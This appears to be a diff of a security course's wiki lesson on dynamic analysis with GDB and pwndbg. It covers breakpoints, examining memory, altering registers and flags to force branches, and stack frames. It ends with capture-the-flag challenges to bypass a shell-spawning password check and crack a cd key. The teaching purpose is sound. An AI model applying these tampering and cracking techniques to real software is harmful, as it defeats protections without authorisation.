When EBP-value is referred to it is generally a referral to a local variable. - -Lets see how this happens with the following code: - -``` {.code .c} -#include - -int add(int a, int b) -{ - int c; - c=a+b; - return c; -} - -int main() -{ - add(10,3); - return 0; -} -``` - -``` {.code .bash} -pwndbg> pdis 0x080483ca -Dump of assembler code for function main: - 0x080483ca <+0>:,push ebp #save the old frame pointer - 0x080483cb <+1>:,mov ebp,esp #create the new frame pointer - 0x080483cd <+3>:,sub esp,0x8 #create space for local variables - 0x080483d0 <+6>:,mov DWORD PTR [esp+0x4],0x3 #push the last parameter of the function that is to be called - 0x080483d8 <+14>:,mov DWORD PTR [esp],0xa #push the second to last(the first in this case) parameter of the function that is to be called - 0x080483df <+21>:,call 0x80483b4 #call the function - 0x080483e4 <+26>:,mov eax,0x0 - 0x080483e9 <+31>:,leave - 0x080483ea <+32>:,ret -End of assembler dump. -pwndbg> pdis 0x080483b4 -Dump of assembler code for function add: - 0x080483b4 <+0>:,push ebp #save the old frame pointer - 0x080483b5 <+1>:,mov ebp,esp #create a new frame pointer - 0x080483b7 <+3>:,sub esp,0x10 #create space for local variables - 0x080483ba <+6>:,mov eax,DWORD PTR [ebp+0xc] #move the first parameter into the EAX register (ebp+saved_ebp(4 bytes)+return_addres(4 bytes)+last_parameter(4 bytes)) - 0x080483bd <+9>:,mov edx,DWORD PTR [ebp+0x8] #move the second parameter into the EDX register (ebp+saved_ebp(4 bytes)+return_addres(4 bytes)) - 0x080483c0 <+12>:,add eax,edx #add the registers - 0x080483c2 <+14>:,mov DWORD PTR [ebp-0x4],eax #place the result inside the local variable (c) - 0x080483c5 <+17>:,mov eax,DWORD PTR [ebp-0x4] #place the result inside the eax register in order to return it - 0x080483c8 <+20>:,leave - 0x080483c9 <+21>:,ret -End of assembler dump. -``` - -As you can see the parameters were pushed in reverse order, and the rule regarding the reference to EBP holds. 
- -If you don\'t understand why the offset for the parameters starts at EBP+0x08 and not EBP, follow through with the next section. - - -#### Calling functions (call and ret) - -When calling a function the caller places the return address on the stack. This address is nothing more than a bookmark so that execution can resume where it left off once the called function finishes -execution. - -The last instruction in functions is usually a `ret` instruction that returns execution to the caller. - -For a better understanding of function calling and returning, from an execution flow point of view, please follow through with the following tip. - -The call instruction could be translated to the following instructions: - -1. `push eip` -2. `mov eip, address_of_called_function` - -The ret instruction could be translated into: - -1. `pop eip` - -The visual depiction of how the stack looks while a program is executing -can be found in section 2 but will be included here as well: - -

- -

- - - -### Next lesson preview: Buffer Overflows - - -Now that we have a complete overview of the stack we can step forward to stack based buffer overflows. - -A buffer overflow takes place when there is a lack of checking regarding boundaries and usually results in complete control of the program\'s instruction pointer. This takes place when a buffer overflows its boundaries and overwrites the return address of a function. - -A typical example of buffer overflows can be seen in the following picture: - -

- -

- -Challenges ----------- - -Use GDB and pwndbg to run the code provided in the Activities section. - -### 01. Challenge - Explore The Simple Password Protected Bash - - -The executable gets input from the user and evaluates it against a static condition. If it succeeds it then calls a `password_accepted` function that prints out a success message and spawns a shell. - -Your task is to use GDB and pwndbg to force the executable to call the `password_accepted` function. - -Gather as much info about the executable as possible through the techniques you have learned in previous sessions. - -Think of modifying registers for forcing the executable to call the function (there is more than one way of doing this). - -### 02. Challenge - Simple Password Protected Bash Destruction - -What is the condition against which your input is evaluated in the `sppb` executable? - -The ultimate goal is to be able to craft an input for the binary so that -the `password_accepted` function is called (modifying registers while -running the program in GDB is just for training purposes). - - - -### 03. Challenge - Domino - -Analyze the binary, reverse engineer what it does and get a nice message -back. - -### 04. Challenge - Call me - -Investigate the binary in `04-challenge-call-me/src/call_me` and find -out the flag. - -
- Hint - There is something hidden you can toy around with. -
- - -
- Hint - The challenge name is a hint. -
- - -### 05. Challenge - Snooze Me - - -I wrote a simple binary that computes the answer to life, the universe and everything. It swear it works... eventually. - -### 06. Challenge - Phone Home - - -To protect their confidential data from those snooping cloud providers, the authors of `06-challenge-phone-home/src/phone_home` have used some obfuscation techniques. - -Unfortunately, the key feature of the application is now unreachable due to a bug. Can you bypass the impossible condition? - -### 07. Challenge - Chain encoder - -How do you reverse something made to be ireversible, you are welcome to find out in this challenge. - -### 08. Challenge - Simple cdkey - -I found this software but i don't have the cd key, can you crack it for me? - ------------------------------------------------------------------------- - -Except where otherwise noted, content on this wiki is licensed under the -following license: [CC Attribution-Share Alike 4.0 International](https://creativecommons.org/licenses/by-sa/4.0/deed.en) +# Dynamic Analysis + +## Introduction + +### Objectives & Rationale + +The first part of this session will give you a walkthrough of the most common GDB principles that we are going to use in exploitation. +In the second half, we are going to use these concepts in practice, to evade a basic key evaluation program. + +Black Box type analysis works best when standard algorithms are used in the program, such as: MD5, SHA1, RSA. +We can change the input to a more suggestive one and use the output to estimate what function was used to convert it. + +Combined with behavioral analysis methods such as using sandboxes or strace/ltrace we can quickly map sections of code to functionalities. + +With dynamic analysis, packed malware can be extracted from memory in unpacked form, enabling us to continue static analysis on the complete binary. + +### Prerequisites + +In the current session we will use GDB extensively. 
+We assume that you are familiar with its basic usage and will move on quickly to some of its more advanced features. + +To brush up on the GDB basics, read this [Refresher](https://security.cs.pub.ro/summer-school/wiki/session/04-gdb "session:04-gdb"). + +The executable used in the demo is called `sppb` and is the challenge 1 binary. + +### Before GDB + +One thing you should always do before firing up GDB is to try to learn all the available information on the executable you're trying to debug through the techniques that have been presented so far. + +For the purposes of this session it is a good idea to always run `objdump` on all the executable files before attaching GDB to them so that you have a better idea of what goes where. + +```console +objdump -M intel -d [executable] +``` + +## GDB Basic Commands + +### Getting help with GDB + +Whenever you want to find out more information about GDB commands feel free to search for it inside [the documentation](http://www.gnu.org/software/gdb/documentation/ "http://www.gnu.org/software/gdb/documentation/") or by using the `help` command followed by your area of interest. +For example, help for the `disassemble` command can be obtained by running the following commands in GDB: + +```text +# Print info about all help areas available. +# Identify the area of your question. +(gdb) help + +# Print info about available data commands. +# Identify the command you want to learn more about. +(gdb) help data + +# Print info about a specific command. +# Find out more about the command you are searching for. +(gdb) help disassemble +``` + +### Opening a program with GDB + +A program can be opened for debugging in a number of ways.
+We can run GDB directly attaching it to a program: + +```console +gdb [executable-file] +``` + +Or we can open up GDB and then specify the program we are trying to attach to using the `file` or `exec-file` command: + +```console +$ gdb +(gdb) file [executable-file] +``` + +Furthermore we can attach GDB to a running service if we know its process id: + +```text +gdb --pid [pid_number] +``` + +### Disassembling + +GDB allows disassembling of binary code using the `disassemble` command +(it may be shortened to `disas`). +The command can be issued either on a +memory address or using labels. + +```text +(gdb) disassemble *main +Dump of assembler code for function main: + 0x080491c9 <+0>: push ebp + 0x080491ca <+1>: mov ebp,esp + 0x080491cc <+3>: push ebx + 0x080491cd <+4>: sub esp,0x4 +=> 0x080491d0 <+7>: mov eax,ds:0x804c030 +....Output omitted..... + +(gdb) disassemble 0x080491c9 +Dump of assembler code for function main: + 0x080491c9 <+0>: push ebp + 0x080491ca <+1>: mov ebp,esp + 0x080491cc <+3>: push ebx + 0x080491cd <+4>: sub esp,0x4 +=> 0x080491d0 <+7>: mov eax,ds:0x804c030 +``` + +### Adding Breakpoints + +Breakpoints are important to suspend the execution of the program being debugged in a certain place. +Adding breakpoints is done with the `break` command. +A good idea is to place a breakpoint at the main function of the program you are trying to exploit. +Given the fact that you have already run `objdump` and disassembled the program you know the address for the start of the main function. +This means that we can set a breakpoint for the start of our program in two ways: + +```text +(gdb) break *main (when the binary is not stripped of symbols) +(gdb) break *0x[main_address_obtained_with_objdump] (when ASLR is off) +``` + +The general format for setting breakpoints in GDB is as follows: + +```text +(gdb) break [LOCATION] [thread THREADNUM] [if CONDITION] +``` + +Issuing the `break` command with no parameters will place a breakpoint at the current address.
+GDB allows using abbreviated forms for all the commands it supports. +Learning these abbreviations comes with time and will greatly improve your work output. +Always be on the lookout for using abbreviated commands. + +The abbreviated command for setting breakpoints is simply `b`. + +### Listing Breakpoints + +At any given time all the breakpoints in the program can be displayed using the `info breakpoints` command: + +```text +(gdb) info breakpoints +``` + +You can also issue the abbreviated form of the command: + +```text +(gdb) i b +``` + +### Deleting Breakpoints + +Breakpoints can be removed by issuing the `delete breakpoints` command followed by the breakpoint's number, as it is listed in the output of the +`info breakpoints` command. + +```text +(gdb) delete breakpoints [breakpoint_number] +``` + +You can also delete all active breakpoints by issuing the `delete breakpoints` command with no parameters: + +```text +(gdb) delete breakpoints +``` + +Once a breakpoint is set you would normally want to launch the program into execution. +You can do this by issuing the `run` command. +The program will start executing and stop at the first breakpoint you have set. + +```text +(gdb) run +``` + +#### Execution Flow + +Execution flow can be controlled in GDB using the `continue`, `stepi` and `nexti` commands as follows: + +```text +(gdb) help continue +# Continue program being debugged, after signal or breakpoint. +# If proceeding from breakpoint, a number N may be used as an argument, +# which means to set the ignore count of that breakpoint to N - 1 (so that the breakpoint won't break until the Nth time it is reached). + +(gdb) help stepi +# Step one instruction exactly. +# Argument N means do this N times (or till program stops for another reason). + +(gdb) help nexti +# Step one instruction, but proceed through subroutine calls. +# Argument N means do this N times (or till program stops for another reason).
+``` + +You can also use the abbreviated format of the commands: `c` (`continue`), `si` (`stepi`), `ni` (`nexti`). + +If at any point you want to start the program execution from the beginning you can always reissue the `run` command. + +Another technique that can be used for setting breakpoints is using offsets. + +As you already know, each assembly instruction takes a certain number of bytes inside the executable file. +This means that whenever you are setting breakpoints using offsets you must always set them at instruction boundaries. + +```text +(gdb) break *main +Breakpoint 1 at 0x80491d0 +(gdb) run +Starting program: sppb + +Breakpoint 1, 0x80491d0 in main () +(gdb) disassemble main +Dump of assembler code for function main: + 0x080491c9 <+0>: push ebp + 0x080491ca <+1>: mov ebp,esp + 0x080491cc <+3>: push ebx + 0x080491cd <+4>: sub esp,0x4 +.....Output omitted..... +(gdb) break *main+4 +Breakpoint 2 at 0x80491cd +``` + +### Examine and Print, Your Most Powerful Tools + +GDB allows examining of memory locations, whether they are specified as addresses or stored in registers. +The `x` command (for *examine*) is arguably one of the most powerful tools in your arsenal and the most common command you are going to run when exploiting.
+The format for the `examine` command is as follows: + +```text +(gdb) x/nfu [address] + n: How many units to print + f: Format character + a Pointer + c Read as integer, print as character + d Integer, signed decimal + f Floating point number + o Integer, print as octal + s Treat as C string (read all successive memory addresses until null character and print as characters) + t Integer, print as binary (t="two") + u Integer, unsigned decimal + x Integer, print as hexadecimal + u: Unit + b: Byte + h: Half-word (2 bytes) + w: Word (4 bytes) + g: Giant word (8 bytes) + i: Instruction (read n assembly instructions from the specified memory address) +``` + +In contrast with the examine command, which reads data at a memory location the `print` command (shorthand `p`) prints out values stored in registers and variables. +The format for the `print` command is as follows: + +```text +(gdb) p/f [what] + f: Format character + a Pointer + c Read as integer, print as character + d Integer, signed decimal + f Floating point number + o Integer, print as octal + s Treat as C string (read all successive memory addresses until null character and print as characters) + t Integer, print as binary (t="two") + u Integer, unsigned decimal + x Integer, print as hexadecimal + i Instruction (read n assembly instructions from the specified memory address) +``` + +For a better explanation please follow through with the following example: + +```text +# A breakpoint has been set inside the program and the program has been run with the appropriate commands to reach the breakpoint. +# At this point we want to see which are the following 10 instructions. 
+(gdb) x/10i 0x80491cd + 0x80491cd : sub esp,0x4 + 0x80491d0 : mov eax,ds:0x804c030 + 0x80491d5 : push 0x0 + 0x80491d7 : push 0x1 + 0x80491d9 : push 0x0 + 0x80491db : push eax + 0x80491dc : call 0x8049080 + +# Let's examine the memory at 0x804a02a because we have a hint that this address holds one of the parameters of the scanf call as it is afterwards placed on the stack (we'll explain later how we have reached this conclusion). +# The other parameter will be an address where the input will be stored. +(gdb) x/s 0x804a02a +0x804a02a: "%d" + +# We now set a breakpoint for *main+56. +(gdb) break *0x08049201 +Breakpoint 3 at 0x08049201 +(gdb) continue +Continuing. + +Breakpoint 3, 0x08049201 in main () + +# We then record the value of the eax register somewhere and use nexti(ni) and then we input an integer. +# Let's examine the address which we recorded earlier corresponding to the eax register (it should've held the address for the integer we input). +# Take note that in GDB registers are preceded by the "$" character very much like variables. +(gdb) x/d 0xffffcf70 <- (your address) +0xffffcf70: +# Now let's print the contents of the eax register as hexadecimal. +(gdb) p/x $eax +$1 = + +# The diference between p and x can be observed by issuing the following commands: +x/s 0x804a030 +0x804a030: "Your password is: %d. Evaluating it...\n" + +p /s 0x804a030 + +# $2 = 1920298841 which is the number in decimal format that "Your" can be translated to by its ascii codes (little endian so written as 0x72756F59). + +# In order to see the same result we must use the command p /s (char*)0x804a030 and dereference the pointer ourselves. +# As you can see the address holds the memory for the beginning of the string. 
+# This shows you how "x" interprets data from memory while "p" merely prints out the contents in the required format +# You can think of it as "x" dereferencing while "p" not dereferencing +``` + +### GDB Command file + +When exploiting, there are a couple of commands that you will issue periodically and doing that by hand will get cumbersome. +GDB command files will allow you to run a specific set of commands automatically after each command you issue manually. +This comes in especially handy when you're stepping through a program and want to see what happens with the registers and stack after each instruction is run, which is the main target when exploiting. + +The examine command only makes sense when code is already running on the machine so inside the file we are going to use the `display` command which translates to the same output. + +In order to use this option you must first create your commands file. +This file can include any GDB commands you like but a good start would be printing out the content of all the register values, the next ten instructions that are going to be executed, and some portion from the top of the stack. + +The reason for examining all of the above after each instruction is run will become more clear once we go through the second section of the session. + +Command file template: + +```text +display/10i $eip +display/x $eax +display/x $ebx +display/x $ecx +display/x $edx +display/x $edi +display/x $esi +display/x $ebp +display/32xw $esp +``` + +In order to view all register values you could use the `x` command.
+However the values of all registers can be obtained by running the`info all-registers` command: + +```text +(gdb) info all-registers +eax 0x8048630,134514224 +ecx 0xbffff404,-1073744892 +edx 0xbffff394,-1073745004 +ebx 0xb7fc6ff4,-1208193036 +esp 0xbffff330,0xbffff330 +ebp 0xbffff368,0xbffff368 +esi 0x0,0 +edi 0x0,0 +eip 0x80484e9,0x80484e9 +eflags 0x286,[ PF SF IF ] +cs 0x73,115 +ss 0x7b,123 +ds 0x7b,123 +es 0x7b,123 +fs 0x0,0 +gs 0x33,51 +st0 *value not available* +st1 *value not available* +st2 *value not available* +st3 *value not available* +st4 *value not available* +st5 *value not available* +st6 *value not available* +st7 *value not available* +fctrl 0x37f,895 +fstat 0x0,0 +ftag 0xffff,65535 +fiseg 0x0,0 +fioff 0x0,0 +foseg 0x0,0 +---Type to continue, or q to quit--- +fooff 0x0,0 +fop 0x0,0 +mxcsr 0x1f80,[ IM DM ZM OM UM PM ] +ymm0 *value not available* +ymm1 *value not available* +ymm2 *value not available* +ymm3 *value not available* +ymm4 *value not available* +ymm5 *value not available* +ymm6 *value not available* +ymm7 *value not available* +mm0 *value not available* +mm1 *value not available* +mm2 *value not available* +mm3 *value not available* +mm4 *value not available* +mm5 *value not available* +mm6 *value not available* +mm7 *value not available* +``` + +One thing you might notice while using GDB is that addresses seem to be pretty similar between runs. +Although with experience you will gain a better feel for where an address points to, one thing to remember at this point would be that stack addresses usually have the `0xbffff….` format. +In order to run GDB with the commands file you have just generated, when launching GDB specify the `-x [command_file]` parameter. + +### Using GDB to modify variables + +GDB can be used to modify variables during runtime. +In the case of exploitation this comes in handy as the program can be altered at runtime with the purpose of changing the execution path to desired branches. 
+ +## Pwndbg + +As you can see, using plain GDB can be cumbersome; this is why we recommend using the pwndbg plug-in. +The tutorial as well as the repository of the project can be found here: [Pwndbg](https://github.com/pwndbg/pwndbg "https://github.com/pwndbg/pwndbg"). + +Given the fact that pwndbg is just a wrapper, all the functionality of GDB will be available when running gdb with the `pwndbg` plug-in. +Some of the advantages of using pwndbg include: + +- Automatic preview of registers, code and stack after each instruction (you no longer need to create your own commands file) +- Automatic dereferencing and following through of memory locations +- Color coding + +An alternative to pwndbg is [Gef](https://github.com/hugsy/gef "https://github.com/hugsy/gef"). +However, this tutorial is designed with Pwndbg in mind. + +### Pwndbg Commands + +The `pdis` command gives a pretty output that is similar to what the `disas` command in GDB prints: + +```text +Usage: pdis 0x80491d0 +``` + +If `pdis` is used with an address as a parameter, the output will be similar to what `x/Ni` prints out (where N is the number of instructions you want to disassemble). Usage: `pdis [address] [N]`, where N is the number of instructions you want to be printed. + +The `stepi` command has the same effect as in GDB; however, if you are running Pwndbg you will notice that after each step Pwndbg will automatically print register values, several lines of code starting from the `eip` +register and a portion of the stack: + +```text +pwndbg> stepi + +LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA +────────────────────────────────────[ REGISTERS ]──────────────────────────────────── +*EAX 0xf7facd20 (_IO_2_1_stdout_) ◂— 0xfbad2084 + EBX 0x0 + ECX 0xa00af61b + EDX 0xffffcfb4 ◂— 0x0 + EDI 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c + ESI 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c + EBP 0xffffcf78 ◂— 0x0 + ESP 0xffffcf70 —▸ 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c +*EIP 0x80491d5 (main+12) ◂— push 0 /* 'j' */
+─────────────────────────────────────[ DISASM ]────────────────────────────────────── + 0x80491d0 mov eax, dword ptr [stdout@GLIBC_2.0] <0x804c030> + ► 0x80491d5 push 0 + 0x80491d7 push 1 + 0x80491d9 push 0 + 0x80491db push eax + 0x80491dc call setvbuf@plt + + 0x80491e1 add esp, 0x10 + 0x80491e4 mov dword ptr [ebp - 8], 0 + 0x80491eb push 0x804a010 + 0x80491f0 call puts@plt + + 0x80491f5 add esp, 4 +──────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────── +In file: /home/kali/Desktop/dokermaker/binary-internal/sessions/05-dynamic-analysis/activities/01-02-challenge-sppb/src/sppb.c + 6 execve("/bin/sh", 0, 0); + 7 } + 8 + 9 int main() + 10 { + ► 11 setvbuf(stdout, NULL, _IOLBF, 0); + 12 int readValue = 0; + 13 + 14 printf("Please provide password: \n"); + 15 scanf("%d", &readValue); + 16 +──────────────────────────────────────[ STACK ]────────────────────────────────────── +00:0000│ esp 0xffffcf70 —▸ 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c +01:0004│ 0xffffcf74 ◂— 0x0 +02:0008│ ebp 0xffffcf78 ◂— 0x0 +03:000c│ 0xffffcf7c —▸ 0xf7de0fd6 (__libc_start_main+262) ◂— add esp, 0x10 +04:0010│ 0xffffcf80 ◂— 0x1 +05:0014│ 0xffffcf84 —▸ 0xffffd024 —▸ 0xffffd1d9 ◂— '/home/kali/Desktop/sppb' +06:0018│ 0xffffcf88 —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0' +07:001c│ 0xffffcf8c —▸ 0xffffcfb4 ◂— 0x0 +────────────────────────────────────[ BACKTRACE ]──────────────────────────────────── + ► f 0 0x80491d5 main+12 + f 1 0xf7de0fd6 __libc_start_main+262 + +``` + +You can always use the following commands to obtain context at any given moment inside the debug process: + +- `context reg` +- `context code` +- `context stack` +- `context all` + +One additional Pwndbg command which can be used to show values in registers is the `telescope` command. +The command dereferentiates pointer values until it gets to a value and prints out the entire trace. 
+ +The command can be used with both registers and memory addresses: + +```text +pwndbg$ telescope $esp +00:0000│ esp 0xffffcf70 —▸ 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c +01:0004│ 0xffffcf74 ◂— 0x0 +02:0008│ ebp 0xffffcf78 ◂— 0x0 +03:000c│ 0xffffcf7c —▸ 0xf7de0fd6 (__libc_start_main+262) ◂— add esp, 0x10 +04:0010│ 0xffffcf80 ◂— 0x1 +05:0014│ 0xffffcf84 —▸ 0xffffd024 —▸ 0xffffd1d9 ◂— '/home/kali/Desktop/sppb' +06:0018│ 0xffffcf88 —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0' +07:001c│ 0xffffcf8c —▸ 0xffffcfb4 ◂— 0x0 +pwndbg> telescope 0xffffcf84 +00:0000│ 0xffffcf84 —▸ 0xffffd024 —▸ 0xffffd1d9 ◂— '/home/kali/Desktop/sppb' +01:0004│ 0xffffcf88 —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0' +02:0008│ 0xffffcf8c —▸ 0xffffcfb4 ◂— 0x0 +03:000c│ 0xffffcf90 —▸ 0xffffcfc4 ◂— 0xe38ae80b +04:0010│ 0xffffcf94 —▸ 0xf7ffdb60 —▸ 0xf7ffdb00 —▸ 0xf7fc93e0 —▸ 0xf7ffd9a0 ◂— ... +05:0014│ 0xffffcf98 —▸ 0xf7fc9410 —▸ 0x804832d ◂— 'GLIBC_2.0' +06:0018│ 0xffffcf9c —▸ 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c +07:001c│ 0xffffcfa0 ◂— 0x1 +``` + +In the example above, the memory address 0x8048630 was loaded into EAX. +That is why examining the register or the memory location gives the same output. + +For more information on various Pwndbg commands you can always visit the Pwndbg help through the `pwndbg` command It is always a better idea to use Pwndbg commands when available. +However you should also know the basics of using GDB as well. + +### Altering variables and memory with Pwndbg and GDB + +In addition to basic registers, GDB has a two extra variables which map onto some of the existing registers, as follows: + +- `$pc - $eip` +- `$sp - $esp` +- `$fp - $ebp` + +In addition to these there are also two registers which can be used to view the processor state `$ps - processor status` + +Values of memory addresses and registers can be altered at execution time. +Because altering memory is a lot easier using Pwndbg we are going to use it throughout today's session. 
+ +The easiest way of altering the execution flow of a program is editing the `$eflags` register just before jump instructions. + +Using GDB the `$eflags` register can be easily modified: + +```text +pwndbg> reg eflags +EFLAGS 0x282 [ cf pf af zf SF IF df of ] +Set the ZF flag +pwndbg> set $eflags |= (1 << 6) +Clear the ZF flag +pwndbg> set $eflags &= ~(1 << 6) +``` + +Notice that the flags that are set are printed in all-caps when the `reg eflags` command is issued. + +The `set` command (GDB native) can be used to modify values that reside inside memory. + +```text +pwndbg> telescope 0x804a010 +00:0000│ 0x804a010 ◂— 'Please provide password: ' +01:0004│ 0x804a014 ◂— 'se provide password: ' +02:0008│ 0x804a018 ◂— 'rovide password: ' +03:000c│ 0x804a01c ◂— 'de password: ' +04:0010│ 0x804a020 ◂— 'assword: ' +05:0014│ 0x804a024 ◂— 'ord: ' +06:0018│ 0x804a028 ◂— 0x64250020 /* ' ' */ +07:001c│ 0x804a02c ◂— 0x0 + +pwndbg> set {char [14]} 0x804a010 = "No pass here" +Written 28 bytes to 0x804a010 +pwndbg> telescope 0x804a010 +00:0000│ 0x804a010 ◂— 'No pass here' +01:0004│ 0x804a014 ◂— 'ass here' +02:0008│ 0x804a018 ◂— 'here' +03:000c│ 0x804a01c ◂— 0x70200000 +04:0010│ 0x804a020 ◂— 'assword: ' +05:0014│ 0x804a024 ◂— 'ord: ' +06:0018│ 0x804a028 ◂— 0x64250020 /* ' ' */ +07:001c│ 0x804a02c ◂— 0x0 +``` + +As you can see the string residing in memory at address `0x804a010` has been modified using the `set` command. + +Pwndbg does not offer enhancements in modifying register values. +For modifying register values you can use the GDB `set` command. + +```text +pwndbg> p/x $eax +$10 = 0x1 +pwndbg> set $eax=0x80 +pwndbg> p/x $eax +$11 = 0x80 +``` + +## The Stack + +This section describes the process of function calling in detail. +Understanding function calling and stack operations during program execution is essential to exploitation. + +The stack is one of the areas of memory which gets the biggest attention in exploitation writing.
+ +### Stack Growth + +The stack grows from high memory addresses to low memory addresses. + +```text +pwndbg> pdis $eip + + 0x80491db push eax + 0x80491dc call setvbuf@plt + + 0x80491e1 add esp, 0x10 + 0x80491e4 mov dword ptr [ebp - 8], 0 + 0x80491eb push 0x804a010 + ► 0x80491f0 call puts@plt + +pwndbg> p/x $esp +$1 = 0xffffcf6c +pwndbg> si +0x8049050 in puts@plt () +pwndbg> p/x $esp +$5 = 0xffffcf68 +``` + +As you can see from the example above the \$esp register had an initial value of `0xffffcf6c`. +The next instruction that is about to be executed is a push (it pushes `0x0` on the stack). +We execute the instruction and then reevaluate the value of `$esp`. +As we can see `$esp` now points to `0xffffcf68` (`0xffffcf6c-0x4`). + +### Frame Pointers and Local Function Variables + +Whenever the processor is entering the execution for a function, a special logical container is created on the stack for that function. + +This container is called a function frame. +The idea behind it is that the processor must know which area of the stack belongs to which function. + +In order to achieve this logical segmentation a set of 2 instructions are automatically inserted by the compiler at the beginning of each function. +Can you tell what they are based on the output below? 
+ +```text +pwndbg> break main +Breakpoint 1 at 0x80484c8 +pwndbg> run +[----------------------------------registers-----------------------------------] + EAX 0xf7fa99e8 (environ) —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0' + EBX 0x0 + ECX 0xb8a6a751 + EDX 0xffffcfb4 ◂— 0x0 + EDI 0x80490a0 (_start) ◂— xor ebp, ebp + ESI 0x1 + EBP 0xffffcf78 ◂— 0x0 + ESP 0xffffcf70 ◂— 0x1 + EIP 0x80491d0 (main+7) ◂— mov eax, dword ptr [0x804c030] +[-------------------------------------code-------------------------------------] + 0x080491c9 <+0>: push ebp + 0x080491ca <+1>: mov ebp,esp + 0x080491cc <+3>: push ebx + 0x080491cd <+4>: sub esp,0x4 +=> 0x080491d0 <+7>: mov eax,ds:0x804c030 + 0x080491d5 <+12>: push 0x0 + 0x080491d7 <+14>: push 0x1 + 0x080491d9 <+16>: push 0x0 + 0x080491db <+18>: push eax + +[------------------------------------stack-------------------------------------] +00:0000│ esp 0xffffcf70 ◂— 0x1 +01:0004│ 0xffffcf74 ◂— 0x0 +02:0008│ ebp 0xffffcf78 ◂— 0x0 +03:000c│ 0xffffcf7c —▸ 0xf7dda905 (__libc_start_main+229) ◂— add esp, 0x10 +04:0010│ 0xffffcf80 ◂— 0x1 +05:0014│ 0xffffcf84 —▸ 0xffffd024 —▸ 0xffffd1d9 ◂— '/home/kali/Desktop/sppb' +06:0018│ 0xffffcf88 —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0' +07:001c│ 0xffffcf8c —▸ 0xffffcfb4 ◂— 0x0 + +[------------------------------------------------------------------------------] +Legend: code, data, rodata, value + +Breakpoint 1, 0x080491d0 in main () +pwndbg> disass password_accepted + + + 0x080491b2 <+0>: push ebp + 0x080491b3 <+1>: mov ebp,esp + 0x080491b5 <+3>: push 0x0 + 0x080491b7 <+5>: push 0x0 + 0x080491b9 <+7>: push 0x804a008 + 0x080491be <+12>: call 0x8049070 + 0x080491c3 <+17>: add esp,0xc + 0x080491c6 <+20>: nop + 0x080491c7 <+21>: leave + 0x080491c8 <+22>: ret + +``` + +What we did is we created a breakpoint for the start of the main function and then ran the program. +As you can see the first 2 instructions that got executed were `push ebp` and `mov ebp,esp`. 
+ +We then set a breakpoint for another function called `password_accepted`, continued execution and entered a password that we know is going to pass validation. +Once the breakpoint is hit, we can see the same 2 instructions `push ebp` and `mov ebp,esp`. + +The two instructions which can be noticed at the beginning of any function are the instructions required for creating the logical container for each function on the stack. + +In essence what they do is save the reference of the old container (`push ebp`) and record the current address at the top of the stack as the beginning of the new container (`mov ebp,esp`). + +For a visual explanation please see below: + +![Frame pointer](https://security.cs.pub.ro/summer-school/wiki/_media/session/s5_frame_pointer_picture.jpg) + +As you can see the EBP register always points to the stack address that corresponds to the beginning of the current function's frame. +That is why it is most often referred to as the frame pointer. + +In addition to the two instructions required for creating a new stack frame for a function, there are a couple more instructions that you will usually see at the beginning of a function. + +If you analyze the instructions at the beginning of main, you can spot these as being: + +- An `and esp,0xfffffff0` instruction. + +- A `sub` instruction that subtracts a hex value from ESP. + +The first of the two instructions has the purpose of aligning the stack to a specific address boundary. +This is done to increase processor efficiency. +In our specific case, the top of the stack gets aligned to a 16 byte multiple address. + +One of the purposes of the stack inside functions is that of offering address space in which to place local variables. +The second instruction preallocates space for local function variables. + +Let's see how local variables are handled inside assembly code. 
+ +```c +#include +int main() +{ + int a; + a=1; + return 0; +} +``` + +```text +kali@kali:~/sss$ gdb test +GNU gdb (Ubuntu/Linaro 7.4-2012.02-0ubuntu2) 7.4-2012.02 +Copyright (C) 2012 Free Software Foundation, Inc. +License GPLv3+: GNU GPL version 3 or later +This is free software: you are free to change and redistribute it. +There is NO WARRANTY, to the extent permitted by law. Type "show copying" +and "show warranty" for details. +This GDB was configured as "i686-linux-gnu". +For bug reporting instructions, please see: +... +Reading symbols from /home/dgioga/sss/test...(no debugging symbols found)...done. +pwndbg> break main +Breakpoint 1 at 0x80483ba +pwndbg> run +[----------------------------------registers-----------------------------------] +EAX: 0x1 +EBX: 0xb7fc6ff4 --> 0x1a0d7c +ECX: 0xbffff414 --> 0xbffff576 ("/home/dgioga/sss/test") +EDX: 0xbffff3a4 --> 0xb7fc6ff4 --> 0x1a0d7c +ESI: 0x0 +EDI: 0x0 +EBP: 0xbffff378 --> 0x0 +ESP: 0xbffff368 --> 0x80483d9 (<__libc_csu_init+9>:,add ebx,0x1c1b) +EIP: 0x80483ba (:,mov DWORD PTR [ebp-0x4],0x1) +EFLAGS: 0x200282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow) +[-------------------------------------code-------------------------------------] + 0x80483b4
